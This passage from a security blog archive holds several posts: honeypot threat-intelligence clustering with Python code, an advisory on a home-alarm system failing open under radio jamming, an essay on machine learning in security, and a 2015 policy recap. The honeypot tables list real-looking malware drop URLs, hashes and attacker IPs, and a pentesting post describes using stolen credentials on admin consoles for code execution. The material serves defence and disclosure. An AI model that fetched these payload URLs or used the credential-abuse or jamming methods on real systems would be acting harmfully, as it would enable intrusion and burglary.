+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| 189.190.50.56   |   50  | first: 2015-11-05 |  23x US       |  50x 80    |  50x GET   |  50x VULN-SHELLSHOCK        |  37x 21762efb4df7cbb6b2331b34907817499f53be99 |  37x http://189.190.50.56/.b.gif                                               |
| MX              |       | last:  2015-12-02 |  22x AU       |            |            |      CVE-2014-6271          |   4x 4172d5b70dfe4f5be3aaeb4b2b78fa230a27b97e |   4x http://189.190.50.56/b.gif                                                |
| AS 8151         |       |                   |   5x BR       |            |            |                             |   4x 3a33f909c486406773b06d8da3b57f530dd80de6 |   4x http://173.220.57.150/scans/ip75.tar                                      |
|                 |       |                   |               |            |            |                             |   3x ebbe8ebb33e78348a024f8afce04ace6b48cc708 |   3x http://173.220.57.150/scans/dom66.tar                                     |
|                 |       |                   |               |            |            |                             |   2x 3caf6f7c6f4953b9bbba583dce738481da338ea7 |   2x http://173.220.57.150/scans/php77.tar                                     |
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
...

 

With my test dataset of roughly 2000 "attacks with downloads" this leads to 195 unique sources, that make use of several drop URLs and payloads over the course of a couple months.

 

Basic Threat Intelligence

Beyond simple correlation by source IP, we can now try to organize this data into some groups - basically trying to correlate several attack sources together based on the payloads and drop sites they use. In addition there are also more in-depth methods like analyzing the malware samples and coming up with specific indicators that allow you to group the binaries together even further.

 

The problem though is that manually doing this grouping is painful, as it's not enough to go one level deep. A source that uses a couple binaries which are also used from another source is the first layer. But then those sources already had their own binaries and URLs, and so on and so forth. Basically it comes down to a simple graph traversal. The individual data points like an attacker ip, a file hash, a drop host ip/name, etc can be viewed as nodes in a graph that have relationships with each other. All connected subgraphs within this graph make up our "groups" / attacker categories.

 

If you create a graph for our honeypot data set, it looks like this:

heisenberg-blog-graph.svg

 

So to categorize our incidents into attacker groups we build up these subgraphs by writing a graph traversal function. We correlate attackers based on binaries used, hosts used for downloading payloads and hosts contacted by the malware samples themselves (sadly didn't get to do this for all of them).

 

  GRAPH = collections.defaultdict(set)

  def add_edge(fr, to):
    # undirected
    GRAPH[fr].add(to)
    GRAPH[to].add(fr)

  def graph_traversal(src):
    visited = set([src])
    queue = [src,]
    while queue:
        parent = queue.pop(0)
        children = GRAPH[parent]
        for child in children:
          if child not in visited:
            yield parent, child
            visited.add(child)
            queue.append(child)

  for e in DATA:
    src = ("source", e["source"])
    payload = ("payload", e["sha1"])
    payloadsrc = ("payloadsrc", e["url.netloc"])

    add_edge(src, payload)
    add_edge(payload, payloadsrc)

    for i in e.get("mal.tcplist", []):
      add_edge(payload, ("c2", i))

  n = 1
  seen = set()

  for src in set(e["source"] for e in DATA):
    if src in seen: continue

    members = set()
    indicators = set()

    for (ta, va), (tb, vb) in graph_traversal(("source", src)):
      if ta == "source": members.add(va)
      else: indicators.add((ta, va))
      if tb == "source": members.add(vb)
      else: indicators.add((tb, vb))

    print json.dumps(dict(members=list(members), indicators=list(indicators), group=n))
    n += 1
    seen |= members

 

This leads to 81 groups, as shown by the next table (full version):

 

+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| key | count | seen              | source               | sourcecountry | srcasn        | sensorcountry | dport      | httpmethod | vulns                       | sha1                                          | url                                                                            |
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
|   3 |  224  | first: 2015-04-09 | 144x 115.29.174.5    | 210x CN       | 144x AS37963  |  84x US       | 224x 9200  | 158x POST  | 224x VULN-ELASTICSEARCH-RCE | 143x 4db1c73a4a33696da9208cc220f8262fb90767af |  65x http://23.234.25.203:15826/udpg                                           |
|     |       | last:  2015-12-13 |  31x 222.186.21.201  |  14x KR       |  66x AS23650  |  44x IE       |            |  66x GET   |      CVE-2014-3120          |  81x 2b1f756d1f5b1723df6872d5727bf55f94c7aba9 |  53x http://23.234.25.203:15826/dos                                            |
|     |       |                   |  14x 14.45.176.29    |               |  14x AS 4766  |  26x JP       |            |            |      EXEC-SHELLCMD          |                                               |  28x http://23.234.25.203:15826/udp                                            |
|     |       |                   |  14x 61.160.247.231  |               |               |  26x SG       |            |            |                             |                                               |  16x http://23.234.25.203:15826/ud                                             |
|     |       |                   |   8x 222.186.21.195  |               |               |  23x AU       |            |            |                             |                                               |  13x http://47.88.21.44:15826/udp                                              |
|     |       |                   |   7x 222.186.21.166  |               |               |  21x BR       |            |            |                             |                                               |   7x http://23.234.25.203:15826/xxoo                                           |
|     |       |                   |   5x 61.160.223.35   |               |               |               |            |            |                             |                                               |   7x http://61.160.223.35:15826/udp                                            |
|     |       |                   |   1x 222.186.34.70   |               |               |               |            |            |                             |                                               |   7x http://23.234.25.203:15826/L88                                            |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   6x http://23.234.25.203:15826/xf23                                           |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   5x http://43.230.147.30:2017/udp                                             |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   4x http://61.160.247.231:15826/udp                                           |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   4x http://23.234.25.203:15826/udp110                                         |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   3x http://222.186.50.47:15826/udpg                                           |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   3x http://222.186.21.201:15826/udp                                           |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   3x http://222.186.34.70:2018/udp                                             |
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
|  12 |   23  | first: 2015-11-17 |   9x 206.217.134.130 |  19x US       |   9x AS36352  |  18x US       |  15x 80    |  15x GET   |  15x VULN-SHELLSHOCK        |   8x 81b65f4165a6b0689c3e7212ccf938dc55aae1bf |   8x http://192.240.106.106/lga                                                |
|     |       | last:  2015-12-13 |   4x 198.245.72.234  |   2x TR       |   4x AS55286  |   3x AU       |   8x 9200  |   8x POST  |      CVE-2014-6271          |   8x c30026c548cd45be89c4fb01aa6df6fd733de964 |   2x http://69.30.200.250/ide.docx                                             |
|     |       |                   |   4x 69.12.70.34     |   1x CA       |   4x AS 8100  |   1x JP       |            |            |   8x VULN-ELASTICSEARCH-RCE |   5x fe01a972a63f754fed0322698e16b2edc933f422 |   2x http://188.138.41.134/dd.exe                                              |
|     |       |                   |   2x 91.191.170.111  |   1x DE       |   2x AS43391  |   1x BR       |            |            |      CVE-2014-3120          |   2x 05f32da77a9c70f429c35828d73d68696ca844f2 |   2x http://37.59.8.213/pacs                                                   |
|     |       |                   |   1x 142.54.187.42   |               |   1x AS30083  |               |            |            |      EXEC-SHELLCMD          |                                               |   2x http://69.30.200.250/jof                                                  |
|     |       |                   |   1x 209.126.110.239 |               |   1x AS32613  |               |            |            |                             |                                               |   1x http://69.58.3.226/api                                                    |
|     |       |                   |   1x 174.142.46.120  |               |   1x AS24940  |               |            |            |                             |                                               |   1x http://192.240.106.106/dax.exe                                            |
|     |       |                   |   1x 136.243.110.172 |               |   1x AS33387  |               |            |            |                             |                                               |   1x http://174.142.46.120/lma1                                                |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://69.12.70.34/api                                                    |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://188.138.41.134/lma1                                                |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://192.240.106.106/pisd                                               |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://69.30.200.250/jla.cp                                               |
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
|  13 |   42  | first: 2015-04-23 |  22x 104.192.0.18    |  22x US       |  22x AS27176  |  14x US       |  21x 10000 |  42x GET   |  42x VULN-QNAP-SHELLSHOCK   |  12x 37c5ca684c2f7c9f5a9afd939bc2845c98ef5853 |  20x http://104.192.0.18/apache                                                |
|     |       | last:  2015-04-27 |  20x 37.220.36.77    |  20x NL       |  20x AS58073  |  10x IE       |  18x 7778  |            |                             |  12x 3e4e34a51b157e5365caa904cbddc619146ae65c |  12x http://104.192.0.18/syn                                                   |
|     |       |                   |                      |               |               |   8x SG       |   3x 8080  |            |                             |   7x 9d3442cfecf6e850a2d89d2817121e46f796a1b1 |   7x http://104.192.0.18/apache2                                               |
|     |       |                   |                      |               |               |   7x BR       |            |            |                             |   7x 9851bcec479204f47a3642177c75a16b58d44c20 |   3x http://104.192.0.18/jawk                                                  |
|     |       |                   |                      |               |               |   3x AU       |            |            |                             |   3x 1a412791a58dca7fc87284e208365d36d19fd864 |                                                                                |
|     |       |                   |                      |               |               |               |            |            |                             |   1x d538717c89943f42716c139426c031a21b83c236 |                                                                                |
...

 

What else?

As mentioned before, this can be done in much more detail, by analyzing the samples further and extracting better/more indicators than the contacted C2 hosts. Also there probably is more data around the hosts / domains used for the drop sites (payload URLs) that could potentially be used to correlate different sets. If we're taking some of the hosts/ips from above and use it to query Project Sonar we'll get dns records, open ports and certificate information:

 

address 104.152.190.2 had port 80/tcp open
address 61.147.107.91 was seen in DNS A record for 58559.url.dnspud.com
address 222.186.21.115 was seen in DNS A record for cc365cc-com-2015-7.com
saw cert 93e5ad9fdf4c9a432a2ebbb6b0e5e0a055051007 on endpoint 216.99.150.113:465
address 89.238.81.138 was seen in DNS A record for www.investorfinder.de
address 97.74.204.6 was seen in DNS A record for teafortwohearts.com
address 115.238.246.180 had port 80/tcp open
address 66.240.252.49 had port 993/tcp open
address 208.76.228.65 was seen in DNS A record for peoplesblueprint.ca
address 222.141.64.65 had DNS PTR record hn.kd.ny.adsl
address 180.97.215.7 was seen in DNS A record for jilijia.net
address 203.171.230.109 was seen in DNS A record for cxyt.org
elbinvestment.com had a DNS a record with value 89.31.143.1
address 222.186.30.21 was seen in DNS A record for www.lerhe.com
saw cert 25907d81d624fd05686111ae73372068488fcc6a on endpoint 178.162.207.107:993
ys-f.ys168.com had a DNS A record pointing to IP 61.147.125.116
address 180.97.215.7 had port 995/tcp open
address 213.155.180.226 had port 465/tcp open
address 113.10.149.45 was seen in DNS A record for school88le.com
...

 

Following this data / or adding it into the graph can yield some interesting results - but it's also of lower "quality" as most of the infrastructure used by the attackers probably consists of compromised systems and has lots of other use and thus there's a lot of noise around the activity of the attacker.

 

Summing up

Looking through these datasets can be fun but also a bit tricky at times. Command-line kungfu and some scripting can help pivot around the dataset if you don't want to put the effort in of using a database and something like SQL queries. Incident data and threat intelligence indicators quite often match the graph data model well and thus we can use of simple graph traversal functions or even a real graph database to analyze our data.

 

In order to analyze most of the samples I implemented Linux support in Cuckoo Sandbox. Available in the current development branch - follow us closely for the release of the next version!

 

Another noteworthy point is that honeypots can still yield some fun (not so much interesting) data nowadays. With internet scanning becoming more popular and easy to do, a few low-skill shotgun-type attackers are joining the game and try to get quick wins by running mass exploitation runs.

 

Rapid7 Labs is always interested in similar stories if you are willing to share them and let us know what you think in the comments!

Also feel free to tweet me personally @repmovsb.

 

Happy HaxMas!

-Mark

 

References:

[1] CARISIRT: Defaulting on Passwords (Part 1): r0_bot | CARI.net Blog

[2] Malware Must Die!: MMD-0030-2015 - New ELF malware on Shellshock: the ChinaZ

[3] Malware Must Die!: MMD-0032-2015 - The ELF ChinaZ "reloaded"

Summary

By creating a failure condition in the 2.4 GHz radio frequency band, the Comcast XFINITY Home Security System fails open, with the base station failing to recognize or alert on a communications failure with the component sensors. In addition, sensors take an inordinate amount of time to re-establish communications with the base station, even if their "closed" state is switched to "open" during the failure event.

 

Update: As of January 6, Comcast is working with Rapid7 to investigate the technical details of the disclosure and potential mitigations. They also flagged that Rapid7 attempted to disclose through invalid email addresses through the xfinity.net domain, and should instead have used "abuse@comcast.net."  We acknowledge this and would like to apologize for the miscommunication. 

 

Product Description

xfinity-armed-everything-is-cool.pngThe Comcast XFINITY Home Security system is a remote-enabled home security system, consisting of a  battery-powered base station and one or more battery-powered sensors, all using the  open standard ZigBee wireless communication protocol.

 

Credit

This issue was discovered by Phil Bosco of Rapid7, Inc.

 

Exploitation

By causing a failure condition in the 2.4 GHz radio frequency band, the security system does not fail closed with an assumption that an attack is underway. Instead, the system fails open, and the security system continues to report that "All sensors are in-tact and all doors are closed. No motion is detected."

 

There does not appear to be a limit to the duration of the failure in order to trigger a warning or other alert. In addition, the sensors take a significant amount of time to re-establish communication with the hub when the radio failure subsides.

 

To demonstrate the issue, the researcher placed a paired window/door sensor in tin foil shielding while the system is in an ARMED state. While armed, the researcher removed the magnet from the sensor, simulating a radio jamming attack and opening the monitored door or window.

 

Once the magnet is removed from the sensor, the sensor was unwrapped and placed within a few inches from the base station hub that controls the alarm system. The system continued to report that it is in ARMED state. The amount of time it takes for the sensor to re-establish communications with the base station and correctly report is in an open state can range from several minutes to up to three hours.

 

There are any number of techniques that could be used to cause interference or deauthentication of the underlying ZigBee-based communications protocol, such as commodity radio jamming equipment and software-based deauthentication attacks on the ZigBee protocol itself.

 

Mitigations

There are no practical mitigations to this issue. A software/firmware update appears to be required in order for the base station to determine how much and how long a radio failure condition should be tolerated and how quickly sensors can re-establish communications with the base station.

 

Disclosure Timeline

 

This vulnerability advisory was prepared in accordance with Rapid7's disclosure policy.

 

  • Mon, Sep 28, 2015: Issue discovered by Phil Bosco of Rapid7
  • Wed, Sep 30, 2015: Internal review by Rapid7
  • Mon, Nov 02, 2015: Attempted to contact the vendor
  • Tue, Nov 23, 2015: Details disclosed to CERT, VU#418072 assigned
  • Tue, Jan 05, 2016: Public disclosure

This post is the eleventh in the series, "12 Days of HaXmas."

 

by Suchin Gururangan, Bob Rudis and the Rapid7 Data Science Team

 

Anomaly detection (i.e. identifying “badness”) and remediation is a hard and expensive process, fraught with false alarms and rabbit holes. The security community is keenly interested in developing and using data-driven tools to filter out noise and automatically detect malicious activity in large networks. While machine-learning offers more flexibility than static, rule-based techniques it is not a silver bullet. In this post, we will cover obstacles in applying machine learning to security and some ways to avoid them.

 

It’s All About the Data

One core concept in machine learning is that the utility of the algorithms being used are only as strong as the datasets being used. What does this mean when applying machine learning techniques to cybersecurity?

 

This is a bit of an oversimplification, but we generally do one of two things with machine learning:

 

  1. Put a bunch of things together into unlabeled groups (unsupervised learning)
  2. Identify new things as being part of already known/labeled groups (classification)

 

Both actions are based on the features associated with each data element.

 

In security, we really want to be able to identify (or classify) a “thing” as good or bad. To do that, the first thing we need is labeled data.

 

At its core, the this classification process is two-fold: first, we train a model on known data and then test it on unknown samples. In particular, adaptable models require a continuous flow of labeled data to train with. Unfortunately, the creation of such labeled data is the most expensive and time-consuming part of the data science process. The data we have is usually messy, incomplete, and inconsistent. While there are many tools to experiment with different algorithms and their parameters, there are few tools to help one develop clean, comprehensive datasets . Often times this means asking practitioners with deep domain expertise to help label existing data elements, which is a very expensive process. You can also try to purchase “good” data but this can be hard to come by in the context of security (and may go stale very quickly). You can also try to use a combination of unsupervised and supervised learning called—unsurprisingly—semi-supervised learning [https://en.wikipedia.org/wiki/Semi-supervised_learning].

 

The creation of labeled data is the most expensive and time-consuming part of the data science process.

 

Regardless of your approach, it’s likely you’ll spent a great deal of time, effort and or money in your quest for labeled data.

 

The Need for Unbiased Data

Bias in training data can hamper the effectiveness of a model to discern between output classes . In the security context, data bias can be interpreted in two ways. First, attack methodologies are becoming more dynamic than ever before. If a predictive model is trained on known patterns and vulnerabilities (i.e. using features from malware that is file-system resident), it may not necessarily detect an unprecedented attack that does not conform to to those trends (i.e. misses features from malware that is only memory resident).

 

Bias can sneak up on you, as well. You may think you can use the Alexa listings to, say, obtain a list of benign domains, but that assumption may turn out to be a bad idea since there is no guarantee that those sites are clean. Getting good ground truth in security is hard.

 

Data bias also comes in the form of class representation. To understand class representation bias, one can look to a core foundation of statistics: Bayes’ theorem.

 

Bayes theorem describes the probability of event A given event B:

eq1.png

Expanding the probability P(B) for the set of two mutually exclusive outcomes, we arrive at the following equation:

eq2.png

Combining the above equations, we arrive at the following alternative statement of Bayes’ theorem:

 

eq3.png

What does this have to do with security? Let’s apply this theorem to a concrete problem to show the emergent issues of training predictive models on biased data.

 

Suppose company X has 1,000 employees, and a security vendor has deployed an intrusion detection system (IDS) alerting the company X when it detects a malicious URL sent to an employee’s inbox. Suppose there are 10 malicious URLs sent to employees of company X per day. Finally, suppose the IDS analyzes 10,000 incoming URLs to company X per day.

 

We’ll use:

 

  • I to denote an incident (i.e. an incoming malicious URL)
  • ¬I denote a non-incident (i.e. an incoming benign URL)
  • A to denote an alarm (i.e. the IDS classifies incoming URL as malicious), and
  • ¬A to denote a non-alarm (the IDS classifies URL as benign).

 

That means:

eq4.png

What’s the probability that an alarm is associated with a real incident? Or, how much can we trust the IDS under these conditions?

 

Using Bayes’ Theorem from above, we know:

eq5.png

We don’t have to use the shorthand version, though:

eq6.png

Now let’s calculate the probability of an incident occurring (and not-occurring)—P(incident) and P(non-incident)—given the parameters of the IDS problem we defined above:

eq7.png

eq8.png

These probabilities emphasize the bias present in the distribution of analyzed URLs. The IDS has little sense of what makes up an incident, as it is trained on very few examples of it. Plugging the probabilities into the equation above, we find that:

eq9.png

To have reasonable confidence in an IDS under these biased conditions, we must have not only unrealistically high hit rate, but also unrealistically low false positive rate. That is, for an IDS to be 80 percent accurate, even with a best case scenario of a 100 percent hit rate, the IDS’ false alarm rate must be 4 x 10−4. In other words, only 4 out of 10,000 alarms can be false positives to achieve this accuracy.

 

Visualizing Accuracy

One way to actually “see” this is with a chart designed to visually depict the accuracy of our classifier (called a receiver operating characteristic—or, ROC—curve):

Picture1.png

From "Proper Use of ROC Curves in Intrusion/Anomaly Detection"

As we train, test and use a model, we want the ratio of true positives to false positives to be better than chance and also accurate enough to make it worthwhile using (in whatever context that happens to be).

In the real world, detection hit rates are much lower and false alarm rates are much higher. Thus, class representation bias in the security context can make machine learning algorithms inaccurate and untrustworthy. When models are trained on only a few examples of one class but many examples of another, the bar for reasonable accuracy is extremely high, and in some cases unachievable . Predictive algorithms run the risk of being "the boy who cried wolf" – annoying and prone to desensitizing security professionals to incident alerts[2] . That last thing you want to do is create a fancy new system that only exacerbates the problem that was identified at the core of the Target/Home Depot breaches.

 

“ When models are trained on only a few examples of one class but many examples of another, the bar for reasonable accuracy is extremely high, and in some cases unachievable

 

 

Avoiding the Pitfalls

Security data scientists can avoid these obstacles with a few measures:

 

  1. Train models with large and balanced data that are representative of all output classes. Take balanced subsamples of your data if necessary and use available techniques to get an understanding of the efficacy of your data sets.
  2. Focus on getting a plethora of labeled data. Amazon’s Mechanical Turk is a useful tool for this and is used by many researches outside of security is one example. Look at open sourced data, and encourage data gathering expeditions.
  3. Encourage security expertise on the team. Domain expertise is crucial to the performance of machine learning algorithms applied in the security space. To keep up with the changing threat landscape, one must have security experience.
  4. Incorporate unsupervised methods into the solution of the data science problem. Focus on organization, presentation, visualization, filtering of data - not just prediction.  Check out this handy tutorial on self-taught learning by Stanford.
  5. Weigh the tradeoff of accuracy (i.e. getting all the “guesses” right) vs. coverage. You can think of this in terms of a Bloom filter. In the case of search, it’s more important that all the matching elements are returned even if that means some incorrect elements are returned. Depending on the application of your classification algorithm, you may be able to make similar tradeoffs.

 

Machine learning has the potential to revolutionize how we detect and respond to malicious activity in our networks. It can weed out signal from noise to help incident responders focus on what’s truly important and help administrators discover patterns in network activity never seen before. However, when delving into applying these algorithms to security we must be aware of caveats of the approach, so we may overcome them.

 

This post is the tenth in the series, "The 12 Days of HaXmas."

 

What's your favorite exploit?

My favorite exploit is not an exploit at all. It's authenticated code execution by design.

 

As an attacker, what you're really looking for is the ability to control a system in all the same ways that a system's normal users and administrators do. Administrators need to examine attributes of the system such as the users that log into it, the software installed on it, the services running on it, and most importantly the data it is meant to process. All of which are important for attackers, too.

 

An exploit can give you that but there are certain downsides. They have the potential to crash servers or trigger IDS/IPS. Exploits also have a half life before they're patched out of existence. Sure, you'll still find an occasional Windows 2000 box vulnerable to everything, but they get rarer by the day. So what does the discerning hacker turn to?

 

As I've said before, my absolute favorite type of vulnerability is authenticated code execution by design. What I mean by that is taking advantage of services that already exist on a network for administrators and users to login to and run commands or executables in the normal course of doing their job. Part of why it's my favorite is because it's not really a vulnerability -- it's just using the system how it was meant to be used.

 

How does the enterprising attacker get these credentials, you ask? Talk to any penetration tester and they'll give you a list of their favorite ways. Most of those lists will include mimikatz but it is not the only thing by any means. Many tools and devices leave creds lying around in plaintext (or an obfuscated plaintext equivalent) all over the place. If an attacker can't find credentials, they're usually easy to guess. I would guess that as the size of an organization increases, the probability of at least one user having a password like "Summer2015" approaches 1. Suffice it to say that once an attacker has a foothold into an organization, the credentials will rain down in a flood of access.

 

Ok, I see your point, where do I use all these stolen credentials?

 

Well, lots of places, that's why it's my favorite.

 

Login services

 

The most obvious servers are those that give direct console access: SSH, telnet, Remote Desktop. As an aside, there are two main RDP clients in Linux, rdesktop(1) and xfreerdp(1). The latter is capable of connecting to newer servers that require network authentication as opposed to typing creds into the normal Windows logon screen.

 

For bonus points, sometimes VNC is configured with no password, turning it into unauthenticated code execution by design.

 

Powershell remoting (along with WinRM, the underlying protocol it uses), fits here, too; with the Invoke-Command cmdlet, you can run arbitrary powershell commands on a target server with the current user's (or a supplied user's) rights. Here's an example of what that looks like, directly from MSDN:

PS C:\> Invoke-Command -ComputerName S1, S2 -ScriptBlock {Get-Process PowerShell}
  PSComputerName    Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id   ProcessName
  --------------    -------  ------    -----      ----- -----   ------     --   -----------
  S1                575      15        45100      40988   200     4.68     1392 PowerShell
  S2                777      14        35100      30988   150     3.68     67   PowerShell

Also in this category, but perhaps less obvious, are things like VSphere (which usually runs on TCP port 902) that allow you to manage virtual machines via some sort of console access. All of the major virtualization technologies and VPS providers have something like this.

 

Then you have things like Windows SMB. The protocol isn't exactly direct console access, but it gives local administrators access to the Service Control Manager and thereby enables psexec. From there, you can run powershell commands, avoiding all the unpleasantness associated with dropping files.

 

Server administration

 

In the java web app world, there are tons of middle-ware doohickeys intended to ease deployment. They vary in complexity and scale, but most of them offer some sort of administration console as a webapp. The one you're most likely familiar with is Tomcat, since it's installed on Metasploitable2. Tomcat's /manager application is intended for administrators to manage installed applications, including the ability to deploy new applications by uploading a WAR archive. Once deployed, WAR archives are essentially executables that can do anything the tomcat user can do, much more than the manager application can do directly.

 

tomcat-manager.png

This is Tomcat 5.5 from Metasploitable, but newer versions offer all the same functionality.

 

IBM WebSphere has basically the same functionality, with the added fun that it often manages multiple servers in a cluster.

 

Then there are the tools that aren't direct login services, but which are intended for doing all the tasks an administrator would want from such services in a web interface; Plesk and CPanel are popular examples. They provide filesystem access including uploads, often direct command execution, and usually an extension/plugin system that allows code execution in whatever language they're written in. In addition, you can use them to enable direct console access, e.g. through CPanel's SSH key manager:

cpanel-manage-ssh.png

 

I place phpMyadmin / phpPgAdmin in this group as well, even though they're usually not code execution in the sense of running an executable or a command. The potential they offer is incontrovertible, though.

 

phpmyadmin.png

 

Content Management Systems

 

A CMS is ostensibly just for content, i.e. blog posts or other such user-facing things an organization wants to make available, either internally or publicly. WordPress and Joomla are two of the most popular CMSs out there. Both have been riddled with vulnerabilities, in no small part due to their flexible plugin systems and an ecosystem allowing anyone to publish their own code that end-users can easily install in a language that is notoriously difficult to write securely. But what may not be immediately apparent is those plugin systems themselves are also authenticated code execution by design. Themes and plugins in both WordPress and Joomla are just PHP code. An authenticated admin can load themes and plugins from anywhere.

 

How do I defend against this?

 

  • Don't expose administration interfaces to the internet if you can help it.

  • Audit successful logins. You should know if Bob from accounting logs into an engineering server at midnight on a Saturday. Likewise, you should know if anyone logs into a hundred boxes in ten minutes. And that activity should throw some red flags.

  • Segment your networks. Bob from accounting probably shouldn't be able to reach those engineering servers at all.

  • Change defaults.

  • Don't reuse passwords. Microsoft's Local Admin Password Solution (LAPS) seems like a pretty good idea.

  • Use Windows' password filter capabilities to prevent users from choosing some of the most common things like "Summer2015" and your company name as passwords.

 

None of the above should come as a surprise.

What about Antivirus, Intrusion Prevention Systems, Application Whitelisting?

 

With some technologies like SSH and Remote Desktop, AV evasion is not even a minor concern because you're using something that's already there, signed by the vendor, and approved by IT.

What about patching?

 

There's nothing to patch. It's not a vulnerability. There are no CVEs for "Remote Desktop is enabled" or "Your server works the way it is supposed to." These types of tools are everywhere and will live forever.

Conclusions

 

Using a remote administration tool that was installed by a legitimate administrator has a lot of advantages.

 

First, it isn't suspicious. AV will not freak out about using something that was installed by IT and whitelisted by an administrator. IPS doesn't care when a legit account logs into a legit app and uses it like it's supposed to be used.

 

Second, the best persistence mechanism of all is a password. Leaving executables in obvious locations is a good way to get caught by those meddling incident response folks but a successful login is at best ambiguous.

 

Third, it turns out that software intended for remote administration is pretty good at remote administration. Things like phpMyAdmin give you tons of power that is hard to match with a necessarily simpler payload. They're also preconfigured by kind administrators in anticipation of your arrival. Because they're setup specifically for the environment in which they run, their settings and their data can get you closer to your goal faster. For example, phpMyAdmin can have saved queries which can save you tons of time in finding what you want to steal.

 

So happy New Year! Go log into something.

This post is the ninth in the series, "The 12 Days of HaXmas."

 

2015 was a big year for cybersecurity policy and legislation; thanks to the Sony breach at the end of 2014 year, we kicked the new year off with a renewed focus on cybersecurity in the US Government. The White House issued three legislative proposals, held a cybersecurity summit, and signed a new Executive Order, all before the end of February. The OPM breach and a series of other high profile cybersecurity stories continued to drive a huge amount of debate on cybersecurity across the Government sphere throughout the year. Pretty much every office and agency is building a position on this topic, and Congress introduced more than 100 bills referencing “cybersecurity” during the year.

 

So where has the security community netted out at the end of the year in terms of policy and legislation? Let’s recap some of the biggest cybersecurity policy developments…

 

Cybersecurity Information Sharing

 

This was Congress’ top priority for cybersecurity legislation in 2015 and the TL;DR is that an info sharing bill was passed right before the end of the year. The idea of an agreed legal framework for cybersecurity information sharing has merit; however, the bill has drawn a great deal of fire over privacy concerns, particularly with regard to how intelligence and law enforcement agencies will use and share information.

 

The final bill was the result of more than five years of debate over various legislative proposals for information sharing, including three separate bills that went through votes in 2015 (two in the House and one in the Senate).  In the end, the final bill was agreed through a conference process between the House and Senate, and included in the Omnibus Appropriations Act.

 

Despite this being the big priority for cybersecurity legislation, a common view in the security community seems to be that this is unlikely to have much impact in the near term. This is partly because organizations with the resources and ability to share cybersecurity information, such as large financial or retail organizations, are already doing so.  The liability limitation granted in the bill means they are able to continue to do this with more confidence. It’s unlikely to draw new organizations into the practice as participation has traditionally centered more on whether the business has the requisite in-house expertise, and a risk profile that makes security a headline priority for the business, rather than questions of liability. For many organizations that strongly advocated for legislation, a key goal was to get the government to improve its processes for sharing information with the private sector. It remains to be seen whether the legislation will actually help with this.

 

Right to Research

 

For those that have read any of my other posts on legislation, you probably know that protecting and promoting research is the primary purpose of Rapid7’s (and my) engagement in the legislative arena. This year was an interesting year in terms of the discussion around the right to research…

 

The DMCA Rulemaking

 

The Digital Millennium Copyright Act (DMCA) prohibits the circumvention of technical measures that control access to copyrighted works, and thus it has traditionally been at odds with security research.  Every three years, there is a “rulemaking” process for the DMCA whereby exemptions to the prohibition can be requested and debated through a multi-phase public process. All granted exemptions reset at this point, so even if your exemption has been passed before, it needs to be re-requested every three years.  The idea of this is to help the law keep up with the changing technological landscape, which is sensible, but the reality is a pretty painful, protracted process that doesn’t really achieve the goal.

 

In 2015, several requests for security research exemptions were submitted: two general ones, one for medical devices, and one for vehicles. The Library of Congress, who oversees the rulemaking process, rolled these exemption requests together and at the end of October it announced approval of an exemption for good faith security research on consumer-centric devices, vehicles, and implantable medical devices. Hooray!

 

Don’t get too excited though – the language in the announcement sounded slightly as though the Library of Congress was approving the exemption against its own better judgment and with some heavy caveats, most notably that it won’t come in to effect for a year (apart from for voting machines, which you can start researching now). More on that here.

 

Despite that, this is a positive step in terms of acceptance for security research, and demonstrates increased support and understanding of its value in the government sector.

 

CFAA Reform

 

The Computer Fraud and Abuse Act (CFAA) is the main anti-hacking law in the US and all kinds of problematic.  The basic issues as relates to security research can be summarized as follows:

  • It’s out of date – it was first passed in 1986, and despite some “updates” since then, it feels woefully out of date. One of the clearest examples of this is that the law talks about access to “protected computers,” which back in ’86 probably meant a giant machine with an actual fence and guard watching over it. Today it means pretty much any device you use that is more technically advanced than a sliderule.
  • It’s ambiguous – the law hinges on the notion of “authorization” (you’re either accessing something without authorization, or exceeding authorized access), yet this term is not defined anywhere, and hence there is no clear line of what is or is not permissible. Call me old fashioned, but I think people should be able to understand what is covered by a law that applies to them…
  • It contains both civil and criminal causes of action. Sadly, most researchers I know have received legal threats at some point. The vast majority have come from technology providers rather than law enforcement; the civil causes of action in the CFAA provide a handy stick for technology providers to wield against researchers when they are concerned about negative consequences of a disclosure.

 

The CFAA is hugely controversial, with many voices (and dollars spent) on all sides of the debate, and as such efforts to update it to address these issues have not yet been successful.

 

In 2015 though, we saw the Administration looking to extend the law enforcement authorities and penalties of the CFAA as a means of tackling cybercrime. This focus found resonance on the Hill, resulting in the development of the International Cybercrime Prevention Act, which was then abridged and turned into an amendment that its sponsors hoped to attach to the cybersecurity information sharing legislation. Ultimately, the amendment was not included with the bill that went to the vote, which was the right outcome in my opinion.

 

The interesting and positive thing about the process though was the diligence of staff in seeking out and listening to feedback from the security research community. The language was revised several times to address security research concerns. To those who feel that the government doesn’t care about security research and doesn’t listen, I want to highlight that the care and consideration shown by the White House, Department of Justice, and various Congressional offices through discussions around CFAA reform this year suggests that is not universally the case. Some people definitely get it, and they are prepared to invest the time to listen to our concerns and get the approach right.

 

It’s Not All Positive News

 

